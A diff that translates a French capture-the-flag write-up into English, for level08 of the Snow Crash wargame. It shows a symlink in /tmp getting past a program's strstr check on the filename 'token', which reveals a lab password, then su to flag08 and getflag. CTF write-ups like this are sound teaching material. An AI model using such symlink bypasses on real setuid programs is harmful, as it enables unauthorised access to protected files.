ChokMania/snow-crash/level08/Ressources/explanations_en.md

 exit(1 <unfinished ...>
 +++ exited (status 1) +++
 </code></pre>
-> On observe le <code>strstr("token", "token")= "token"</code> qui veut dire que nous ne pouvons pas lire le fichier quand ce dernier s'appelle "token"
+> We observe the <code>strstr("token", "token")= "token"</code> which means that we cannot read the file when it is called "token"

-Donc on créé un lien symbolique avec un nom different afin de contourner la vérification :
+So we create a symbolic link with a different name in order to bypass the verification
 <pre><code>> ln -s `pwd`/token /tmp/mdp
 ./level08 /tmp/mdp
 quif5eloekouj29ke0vouxean
 </code></pre>

-On teste le mot de passe :
+We test the password :
 <pre>
 <code>> su flag08</code>
 <code>Password: quif5eloekouj29ke0vouxean</code>
 </pre>

-On obtient la phrase magique **Don't forget to launch getflag !**
+You get the magic phrase **Ne pas oublier de lancer getflag !**

 <pre>
 <code>> getflag</code>